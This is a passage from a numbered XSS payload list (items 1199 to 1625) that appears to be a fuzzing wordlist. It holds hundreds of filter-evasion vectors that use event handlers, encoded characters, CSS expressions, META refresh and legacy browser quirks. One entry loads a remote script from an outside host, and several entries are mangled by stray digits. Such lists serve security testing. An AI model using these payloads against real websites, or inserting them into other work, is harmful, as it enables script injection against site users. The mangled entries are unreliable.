  1199. `"'><img src=xxx:x \x20onerror=javascript:alert(1612)>
  1200. "`'><script>\x3Bjavascript:alert(1613)</script>
  1201. "`'><script>\x0Djavascript:alert(1614)</script>
  1202. "`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
  1203. "`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
  1204. "`'><script>\xE2\x80\x84javascript:alert(1617)</script>
  1205. "`'><script>\xE3\x80\x80javascript:alert(1618)</script>
  1206. "`'><script>\x09javascript:alert(1619)</script>
  1207. "`'><script>\xE2\x80\x89javascript:alert(1620)</script>
  1208. "`'><script>\xE2\x80\x85javascript:alert(1621)</script>
  1209. "`'><script>\xE2\x80\x88javascript:alert(1622)</script>
  1210. "`'><script>\x00javascript:alert(1623)</script>
  1211. "`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
  1212. "`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
  1213. "`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
  1214. "`'><script>\x0Cjavascript:alert(1627)</script>
  1215. "`'><script>\x2Bjavascript:alert(1628)</script>
  1216. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
  1217. "`'><script>-javascript:alert(1630)</script>
  1218. "`'><script>\x0Ajavascript:alert(1631)</script>
  1219. "`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
  1220. "`'><script>\x7Ejavascript:alert(1633)</script>
  1221. "`'><script>\xE2\x80\x87javascript:alert(1634)</script>
  1222. "`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
  1223. "`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
  1224. "`'><script>\xC2\x85javascript:alert(1637)</script>
  1225. "`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
  1226. "`'><script>\xE2\x80\x83javascript:alert(1639)</script>
  1227. "`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
  1228. "`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
  1229. "`'><script>\xE2\x80\x80javascript:alert(1642)</script>
  1230. "`'><script>\x21643javascript:alert(1643)</script>
  1231. "`'><script>\xE2\x80\x82javascript:alert(1644)</script>
  1232. "`'><script>\xE2\x80\x86javascript:alert(1645)</script>
  1233. "`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
  1234. "`'><script>\x0Bjavascript:alert(1647)</script>
  1235. "`'><script>\x20javascript:alert(1648)</script>
  1236. "`'><script>\xC2\xA0javascript:alert(1649)</script>
  1237. "/><img/onerror=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
  1238. "/><img/onerror=\x22javascript:alert(1651)\x22src=xxx:x />
  1239. "/><img/onerror=\x09javascript:alert(1652)\x09src=xxx:x />
  1240. "/><img/onerror=\x27javascript:alert(1653)\x27src=xxx:x />
  1241. "/><img/onerror=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
  1242. "/><img/onerror=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
  1243. "/><img/onerror=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
  1244. "/><img/onerror=\x60javascript:alert(1657)\x60src=xxx:x />
  1245. "/><img/onerror=\x20javascript:alert(1658)\x20src=xxx:x />
  1246. <script\x2F>javascript:alert(1659)</script>
  1247. <script\x20>javascript:alert(1660)</script>
  1248. <script\x0D>javascript:alert(1661)</script>
  1249. <script\x0A>javascript:alert(1662)</script>
  1250. <script\x0C>javascript:alert(1663)</script>
  1251. <script\x00>javascript:alert(1664)</script>
  1252. <script\x09>javascript:alert(1665)</script>
  1253. "><img src=x onerror=javascript:alert(1666)>
  1254. "><img src=x onerror=javascript:alert(1667)>
  1255. "><img src=x onerror=javascript:alert(1668)>
  1256. "><img src=x onerror=javascript:alert(1669)>
  1257. "><img src=x onerror=javascript:alert(1670))>
  1258. "><img src=x onerror=javascript:alert(1671))>
  1259. "><img src=x onerror=javascript:alert(1672))>
  1260. "><img src=x onerror=javascript:alert(1673)>
  1261. "><img src=x onerror=javascript:alert(1674))>
  1262. "><img src=x onerror=javascript:alert(1675))>
  1263. "><img src=x onerror=javascript:alert(1676)>
  1264. "><img src=x onerror=javascript:alert(1677))>
  1265. "><img src=x onerror=javascript:alert(1678)>
  1266. "><img src=x onerror=javascript:alert(1679))>
  1267. "><img src=x onerror=javascript:alert(1680)>
  1268. `"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
  1269. `"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
  1270. `"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
  1271. `"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
  1272. `"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
  1273. `"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
  1274. `"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
  1275. <script>javascript:alert(1688)<\x00/script>
  1276. <img src=# onerror\x3D"javascript:alert(1689)" >
  1277. <input onfocus=javascript:alert(1690) autofocus>
  1278. <input onblur=javascript:alert(1691) autofocus><input autofocus>
  1279. <video poster=javascript:javascript:alert(1692)//
  1280. <body onscroll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  1281. <form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
  1282. <video><source onerror="javascript:javascript:alert(1695)">
  1283. <video onerror="javascript:javascript:alert(1696)"><source>
  1284. <form><button formaction="javascript:javascript:alert(1697)">X
  1285. <body oninput=javascript:alert(1698)><input autofocus>
  1286. <math href="javascript:javascript:alert(1699)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
  1287. <frameset onload=javascript:alert(1700)>
  1288. <table background="javascript:javascript:alert(1701)">
  1289. <!--<img src="--><img src=x onerror=javascript:alert(1702)//">
  1290. <comment><img src="</comment><img src=x onerror=javascript:alert(1703))//">
  1291. <![><img src="]><img src=x onerror=javascript:alert(1704)//">
  1292. <style><img src="</style><img src=x onerror=javascript:alert(1705)//">
  1293. <li style=list-style:url() onerror=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1706)></div>
  1294. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
  1295. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
  1296. <OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
  1297. <b <script>alert(1712)</script>0
  1298. <div id="div1713"><input value="``onmouseover=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
  1299. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1714)//'>
  1300. <embed src="javascript:alert(1715)">
  1301. <img src="javascript:alert(1716)">
  1302. <image src="javascript:alert(1717)">
  1303. <script src="javascript:alert(1718)">
  1304. <div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
  1305. <? foo="><script>javascript:alert(1720)</script>">
  1306. <! foo="><script>javascript:alert(1721)</script>">
  1307. </ foo="><script>javascript:alert(1722)</script>">
  1308. <? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
  1309. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
  1310. <% foo><x foo="%><script>javascript:alert(1725)</script>">
  1311. <div id=d><x xmlns="><iframe onload=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
  1312. <img \x00src=x onerror="alert(1727)">
  1313. <img \x47src=x onerror="javascript:alert(1728)">
  1314. <img \x17291729src=x onerror="javascript:alert(1729)">
  1315. <img \x17302src=x onerror="javascript:alert(1730)">
  1316. <img\x47src=x onerror="javascript:alert(1731)">
  1317. <img\x17320src=x onerror="javascript:alert(1732)">
  1318. <img\x17333src=x onerror="javascript:alert(1733)">
  1319. <img\x32src=x onerror="javascript:alert(1734)">
  1320. <img\x47src=x onerror="javascript:alert(1735)">
  1321. <img\x17361736src=x onerror="javascript:alert(1736)">
  1322. <img \x47src=x onerror="javascript:alert(1737)">
  1323. <img \x34src=x onerror="javascript:alert(1738)">
  1324. <img \x39src=x onerror="javascript:alert(1739)">
  1325. <img \x00src=x onerror="javascript:alert(1740)">
  1326. <img src\x09=x onerror="javascript:alert(1741)">
  1327. <img src\x17420=x onerror="javascript:alert(1742)">
  1328. <img src\x17433=x onerror="javascript:alert(1743)">
  1329. <img src\x32=x onerror="javascript:alert(1744)">
  1330. <img src\x17452=x onerror="javascript:alert(1745)">
  1331. <img src\x17461746=x onerror="javascript:alert(1746)">
  1332. <img src\x00=x onerror="javascript:alert(1747)">
  1333. <img src\x47=x onerror="javascript:alert(1748)">
  1334. <img src=x\x09onerror="javascript:alert(1749)">
  1335. <img src=x\x17500onerror="javascript:alert(1750)">
  1336. <img src=x\x17511751onerror="javascript:alert(1751)">
  1337. <img src=x\x17522onerror="javascript:alert(1752)">
  1338. <img src=x\x17533onerror="javascript:alert(1753)">
  1339. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1754)">
  1340. <img src=x onerror=\x09"javascript:alert(1755)">
  1341. <img src=x onerror=\x17560"javascript:alert(1756)">
  1342. <img src=x onerror=\x17571757"javascript:alert(1757)">
  1343. <img src=x onerror=\x17582"javascript:alert(1758)">
  1344. <img src=x onerror=\x32"javascript:alert(1759)">
  1345. <img src=x onerror=\x00"javascript:alert(1760)">
  1346. <a href=java&#1761&#2&#3&#4&#5&#6&#7&#8&#17611761&#17612script:javascript:alert(1761)>XXX</a>
  1347. <img src="x` `<script>javascript:alert(1762)</script>"` `>
  1348. <img src onerror /" '"= alt=javascript:alert(1763)//">
  1349. <title onpropertychange=javascript:alert(1764)></title><title title=>
  1350. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1765)></a>">
  1351. <!--[if]><script>javascript:alert(1766)</script -->
  1352. <!--[if<img src=x onerror=javascript:alert(1767)//]> -->
  1353. <object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
  1354. <a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
  1355. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
  1356. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
  1357. <style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
  1358. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
  1359. <// style=x:expression\28javascript:alert(1779)\29>
  1360. <style>*{x:expression(javascript:alert(1780))}</style>
  1361. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
  1362. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1788)}}).$=eval</script>
  1363. <script>({0:#0=eval/#0#/#0#(javascript:alert(1789))})</script>
  1364. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1790)}),x</script>
  1365. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1791)')()</script>
  1366. <meta charset="mac-farsi">¼script¾javascript:alert(1794)¼/script¾
  1367. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1795)` >
  1368. 1796<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41796vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1796)>`>
  1369. 1797<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1797)>>
  1370. 1799<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1799) strokecolor=white strokeweight=1799000px from=0 to=1799000 /></a>
  1371. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
  1372. <event-source src="%(event)s" onload="javascript:alert(1803)">
  1373. <a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  1374. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#18051805;src=x:x&#18051805;onerror&#18051805;=javascript:alert(1805)>">
  1375. <script>javascript:alert(1809)</script>
  1376. <IMG SRC="javascript:javascript:alert(1810);">
  1377. <IMG SRC=javascript:javascript:alert(1811)>
  1378. <IMG SRC=`javascript:javascript:alert(1812)`>
  1379. <FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
  1380. <BODY ONLOAD=javascript:alert(1815)>
  1381. <BODY ONLOAD=javascript:javascript:alert(1816)>
  1382. <IMG SRC="jav ascript:javascript:alert(1817);">
  1383. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1818)>
  1384. <IMG SRC="javascript:javascript:alert(1821)"
  1385. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
  1386. <IMG DYNSRC="javascript:javascript:alert(1824)">
  1387. <IMG LOWSRC="javascript:javascript:alert(1825)">
  1388. <BGSOUND SRC="javascript:javascript:alert(1826);">
  1389. <BR SIZE="&{javascript:alert(1827)}">
  1390. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
  1391. <STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
  1392. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
  1393. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
  1394. <IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
  1395. <TABLE BACKGROUND="javascript:javascript:alert(1837)">
  1396. <TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
  1397. <DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
  1398. <DIV STYLE="width:expression(javascript:alert(1840));">
  1399. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
  1400. <XSS STYLE="xss:expression(javascript:alert(1842))">
  1401. <STYLE TYPE="text/javascript">javascript:alert(1843);</STYLE>
  1402. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
  1403. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
  1404. <!--[if gte IE 4]><SCRIPT>javascript:alert(1846);</SCRIPT><![endif]-->
  1405. <BASE HREF="javascript:javascript:alert(1847);//">
  1406. <OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1849)></OBJECT>
  1407. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1850)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1408. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1851)</SCRIPT>"></BODY></HTML>
  1409. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
  1410. <body onscroll=javascript:alert(1855)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1411. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1856)">
  1412. <STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
  1413. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1859)&&;&&<&&/script&&>
  1414. <SCRIPT onreadystatechange=javascript:javascript:alert(1860);></SCRIPT>
  1415. <style onreadystatechange=javascript:javascript:alert(1861);></style>
  1416. <?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert(1862);</html:script></html:html>
  1417. <embed code=javascript:javascript:alert(1864);></embed>
  1418. <frameset onload=javascript:javascript:alert(1866)></frameset>
  1419. <object onerror=javascript:javascript:alert(1867)>
  1420. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
  1421. <IMG SRC=&{javascript:alert(1870);};>
  1422. <a href="jav&#65ascript:javascript:alert(1871)">test1871</a>
  1423. <a href="jav&#97ascript:javascript:alert(1872)">test1872</a>
  1424. <iframe srcdoc="&LT;iframe&sol;srcdoc=<img&sol;src=&apos;&apos;onerror=javascript:alert(1874)>>">
  1425. ';alert(1875))//';alert(1875))//";
  1426. alert(1876))//";alert(1876))//--
  1427. ></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
  1428. <IMG SRC="javascript:alert(1880);">
  1429. <IMG SRC=javascript:alert(1881)>
  1430. <IMG SRC=JaVaScRiPt:alert(1882)>
  1431. <IMG SRC=javascript:alert(1883)>
  1432. <IMG SRC=`javascript:alert(1884)`>
  1433. <a onmouseover="alert(1885)">xxs link</a>
  1434. <a onmouseover=alert(1886)>xxs link</a>
  1435. <IMG """><SCRIPT>alert(1887)</SCRIPT>">
  1436. <IMG SRC=javascript:alert(1888))>
  1437. <IMG SRC=# onmouseover="alert(1889)">
  1438. <IMG SRC= onmouseover="alert(1890)">
  1439. <IMG onmouseover="alert(1891)">
  1440. <IMG SRC="jav ascript:alert(1895);">
  1441. <IMG SRC="jav        ascript:alert(1896);">
  1442. <IMG SRC="jav
  1443. ascript:alert(1897);">
  1444. <IMG SRC="jav
    ascript:alert(1898);">
  1445. perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
  1446. <IMG SRC=" &#14;  javascript:alert(1900);">
  1447. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1902)>
  1448. <<SCRIPT>alert(1904);//<</SCRIPT>
  1449. <IMG SRC="javascript:alert(1907)"
  1450. \";alert(1909);//
  1451. </TITLE><SCRIPT>alert(1910);</SCRIPT>
  1452. <INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
  1453. <BODY BACKGROUND="javascript:alert(1912)">
  1454. <IMG DYNSRC="javascript:alert(1913)">
  1455. <IMG LOWSRC="javascript:alert(1914)">
  1456. <STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
  1457. <BODY ONLOAD=alert(1918)>
  1458. <BGSOUND SRC="javascript:alert(1919);">
  1459. <BR SIZE="&{alert(1920)}">
  1460. <LINK REL="stylesheet" HREF="javascript:alert(1921);">
  1461. <STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
  1462. <IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
  1463. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1928))'>
  1464. <STYLE TYPE="text/javascript">alert(1929);</STYLE>
  1465. <STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
  1466. <STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
  1467. <STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
  1468. <XSS STYLE="xss:expression(alert(1933))">
  1469. ¼script¾alert(1935)¼/script¾
  1470. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
  1471. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
  1472. <IFRAME SRC="javascript:alert(1939);"></IFRAME>
  1473. <IFRAME SRC=# onmouseover="alert(1940)"></IFRAME>
  1474. <FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
  1475. <TABLE BACKGROUND="javascript:alert(1942)">
  1476. <TABLE><TD BACKGROUND="javascript:alert(1943)">
  1477. <DIV STYLE="background-image: url(javascript:alert(1944))">
  1478. <DIV STYLE="background-image: url(&#1;javascript:alert(1946))">
  1479. <DIV STYLE="width: expression(alert(1947));">
  1480. <BASE HREF="javascript:alert(1948);//">
  1481. <? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
  1482. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
  1483. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1957);+ADw-/SCRIPT+AD4-
  1484. <img src=``&NewLine; onerror=alert(1977)&NewLine;
  1485. <script /**/>/**/alert(1981)/**/</script /**/
  1486. <iframe/src="data:text/html,<svg &#198319831983;&#198319830;load=alert(1983)>">
  1487. <meta content="&NewLine; 1984 &NewLine;; JAVASCRIPT&colon; alert(1984)" http-equiv="refresh"/>
  1488. <form><iframe         ䷐&#19921992; src="javascript:alert(1992)"&#19921992;䷐        ;>
  1489. http://www.google<script .com>alert(1994)</script
  1490. <script ^__^>alert(1998))</script ^__^
  1491. </style  ><script   :-(>/**/alert(1999)/**/</script   :-(
  1492. &#00;</form><input type"date" onfocus="alert(2000)">
  1493. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(2004)&NewLine;>X</a>
  1494. <script ~~~>alert(2005)</script ~~~>
  1495. <iframe// src=javaSCRIPT&colon;alert(2013)
  1496. <%<!--'%><script>alert(2030);</script -->
  1497. <script src="data:text/javascript,alert(2031)"></script>
  1498. <iframe/onreadystatechange=alert(2033)
  1499. <svg/onload=alert(2034)
  1500. <input type="text" value=`` <div/onmouseover='alert(2036)'>X</div>
  1501. <img src=`xx:xx`onerror=alert(2038)>
  1502. <meta http-equiv="refresh" content="0;javascript&colon;alert(2040)"/>
  1503. <script>+-+-2050-+-+alert(2050)</script>
  1504. <body/onload=<!-->&#20510alert(2051)>
  1505. <script itworksinallbrowsers>/*<script* */alert(2052)</script
  1506. <img src ?itworksonchrome?\/onerror = alert(2053)
  1507. <svg><script onlypossibleinopera:-)> alert(2055)
  1508. <script x> alert(2057) </script 2057=2
  1509. <div/onmouseover='alert(2058)'> style="x:">
  1510. <--`<img/src=` onerror=alert(2059)> --!>
  1511. <div style="position:absolute;top:0;left:0;width:206100%;height:206100%" onmouseover="prompt(2061)" onclick="alert(2061)">x</button>
  1512. <form><button formaction=javascript&colon;alert(2063)>CLICKME
  1513. <script>alert(2071);</script>
  1514. <script>alert(2072);</script>
  1515. <IMG SRC="javascript:alert(2073);">
  1516. <IMG SRC=javascript:alert(2074)>
  1517. <IMG SRC=javascript:alert(2075)>
  1518. <IMG SRC=javascript:alert(2076)>
  1519. <IMG """><SCRIPT>alert(2077)</SCRIPT>">
  1520. <scr<script>ipt>alert(2078);</scr</script>ipt>
  1521. <script>alert(2079))</script>
  1522. <img src=foo.png onerror=alert(2080) />
  1523. <style>@im\port'\ja\vasc\ript:alert(2081)';</style>
  1524. <? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
  1525. <marquee><script>alert(2083)</script></marquee>
  1526. <IMG SRC=\"jav        ascript:alert(2084);\">
  1527. <IMG SRC=\"jav
  1528. ascript:alert(2085);\">
  1529. <IMG SRC=\"jav
    ascript:alert(2086);\">
  1530. <IMG SRC=javascript:alert(2087))>
  1531. "><script>alert(2088)</script>
  1532. </title><script>alert(2090)</script>
  1533. </textarea><script>alert(2091)</script>
  1534. <IMG LOWSRC=\"javascript:alert(2092)\">
  1535. <IMG DYNSRC=\"javascript:alert(2093)\">
  1536. <font style='color:expression(alert(2094))'>
  1537. <img src="javascript:alert(2095)">
  1538. <script language="JavaScript">alert(2096)</script>
  1539. <body onunload="javascript:alert(2097);">
  1540. <body onLoad="alert(2098);"
  1541. [color=red' onmouseover="alert(2099)"]mouse over[/color]
  1542. "/></a></><img src=2100.gif onerror=alert(2100)>
  1543. window.alert(2101);
  1544. alert(2103));'))">
  1545. <iframe<?php echo chr(11)?> onload=alert(2104)></iframe>
  1546. "><script alert(2105))</script>
  1547. '">><script>alert(2107)</script>
  1548. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
  1549. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
  1550. <script>2111 2111 = 1; alert(2111)</script>
  1551. <STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
  1552. <?='<SCRIPT>alert(2113)</SCRIPT>'?>
  1553. " onfocus=alert(2115) "> <"
  1554. <FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
  1555. <STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
  1556. perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
  1557. perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
  1558. <br size=\"&{alert(2120)}\">
  1559. <scrscriptipt>alert(2121)</scrscriptipt>
  1560. </br style=a:expression(alert(21222122>
  1561. </script><script>alert(2123)</script>
  1562. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
  1563. [color=red width=expression(alert(2125))][color]
  1564. <BASE HREF="javascript:alert(2126);//">
  1565. "></iframe><script>alert(2128)</script>
  1566. <body onLoad="while(true) alert(2129);">
  1567. '"></title><script>alert(2130)</script>
  1568. </textarea>'"><script>alert(2131)</script>
  1569. '""><script language="JavaScript"> alert(2132);</script>
  1570. </script></script><<<<script><>>>><<<script>alert(2133)</script>
  1571. <INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
  1572. '></select><script>alert(2136)</script>
  1573. a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
  1574. ='><script>alert(2141)</script>
  1575. <body background=javascript:'"><script>alert(2143)</script>></body>
  1576. ">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
  1577. ">/KinG-InFeT.NeT/><script>alert(2145)</script>
  1578. !--" /><script>alert(2148);</script>
  1579. <script>alert(2149)</script><marquee><h1>XSS by xss</h1></marquee>
  1580. "><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
  1581. '"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
  1582. <img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
  1583. <script>alert(2153)</script><marquee><h1>XSS by xss</h1></marquee>
  1584. "><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
  1585. '"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
  1586. <iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
  1587. '><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
  1588. "><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
  1589. \'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
  1590. '); alert(2162); var x='
  1591. \\'); alert(2163);var x=\'
  1592. //--></SCRIPT><SCRIPT>alert(2164));
  1593. >"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
  1594. <SCRIPT> alert(2170); </SCRIPT>
  1595. <BODY ONLOAD=alert(2171)>
  1596. <BODY BACKGROUND="javascript:alert(2172)">
  1597. <IMG SRC="javascript:alert(2173);">
  1598. <IMG DYNSRC="javascript:alert(2174)">
  1599. <IMG LOWSRC="javascript:alert(2175)">
  1600. <INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
  1601. <LINK REL="stylesheet" HREF="javascript:alert(2178);">
  1602. <TABLE BACKGROUND="javascript:alert(2179)">
  1603. <TD BACKGROUND="javascript:alert(2180)">
  1604. <DIV STYLE="background-image: url(javascript:alert(2181))">
  1605. <DIV STYLE="width: expression(alert(2182));">
  1606. &apos;;alert(2185))//\&apos;;alert(2185))//";alert(2185))//\";alert(2185))//--></SCRIPT>">&apos;><SCRIPT>alert(2185))</SCRIPT>
  1607. <SCRIPT>alert(2187)</SCRIPT>
  1608. <SCRIPT>alert(2189))</SCRIPT>
  1609. <BASE HREF="javascript:alert(2190);//">
  1610. <BGSOUND SRC="javascript:alert(2191);">
  1611. <BODY BACKGROUND="javascript:alert(2192);">
  1612. <BODY ONLOAD=alert(2193)>
  1613. <DIV STYLE="background-image: url(javascript:alert(2194))">
  1614. <DIV STYLE="background-image: url(&#1;javascript:alert(2195))">
  1615. <DIV STYLE="width: expression(alert(2196));">
  1616. <FRAMESET><FRAME SRC="javascript:alert(2197);"></FRAMESET>
  1617. <IFRAME SRC="javascript:alert(2198);"></IFRAME>
  1618. <INPUT TYPE="IMAGE" SRC="javascript:alert(2199);">
  1619. <IMG SRC="javascript:alert(2200);">
  1620. <IMG SRC=javascript:alert(2201)>
  1621. <IMG DYNSRC="javascript:alert(2202);">
  1622. <IMG LOWSRC="javascript:alert(2203);">
  1623. <STYLE>li {list-style-image: url("javascript:alert(2207)");}</STYLE><UL><LI>XSS
  1624. %BCscript%BEalert(2211)%BC/script%BE
  1625. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(2212);">
